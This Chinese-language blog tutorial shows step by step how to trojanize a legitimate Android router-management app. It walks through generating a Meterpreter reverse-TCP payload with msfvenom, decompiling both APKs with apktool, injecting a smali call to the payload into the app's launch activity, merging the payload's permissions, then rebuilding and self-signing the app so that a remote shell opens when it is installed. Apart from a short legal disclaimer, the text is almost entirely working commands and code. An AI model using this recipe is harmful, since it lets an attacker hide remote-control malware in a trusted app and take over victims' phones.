本示例仅为学习研究所用,使用请准守《网络安全法》。造成一切后果,自行承担。本站不但任何责任!!!

前期的准备

  • 某路由器管理APP(luyou.apk)
  • kali Linux

  • 手机(android 10)

    01 生成Android shell

    在生成之前,确定本机的ip地址。

    msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.93 LPORT=5555 R > 66.apk

    这样我们便生成了一个名为66.apk的android shell

    02 反编译刚才生成的shell和正常app

    apktool d 66.apk
apktool d luyou.apk


    反编译后的效果

    03 注入PAYLOAD

    -1 进入luyou文件夹,打开AndroidManifest.xml文件
    -2 搜索关键字LaunchMain找到所对应启动的smail文件,说白了就是找app启动文件路径

    当前的启动路径为:com/mercury/mercuryrouterLaunchActivity
    打开文件LaunchActivity.smali搜索onCreat函数,找到bundle对象,换行添加启动PAYLOAD代码:

    invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V

    04 将木马文件中的smali文件复制到载体smali文件夹中

    cp -r 66/smali/com/* luyou/smali/com/

    05添加权限

    打开木马AndroidManifest.xml文件
    复制以<uses-permission android:name=.......>
    开头的所有代码按照格式复制到载体luyou的AndroidManifest.xml文件中,删除重复权限就ok

    06回遍

    apktool b luyou

    07签名

    这样我们的app添加就算完成了,但是在手机是无法运行的。因为没有签名。
    生成KEYSTORE:

    keytool -genkey -v -keystore mykey.keystore -alias alias_name -keyalg RSA -keysize 1024 -validity 22222

    签名:

    jarsigner -keystore mykey.keystore luyou.apk alias_name -s

    08 测试

    安装app

    msf终端成功上线

版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/1805.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

Kali笔记一键关注
Last modification:March 2, 2020
© Allow specification reprint
正在沿街乞讨中……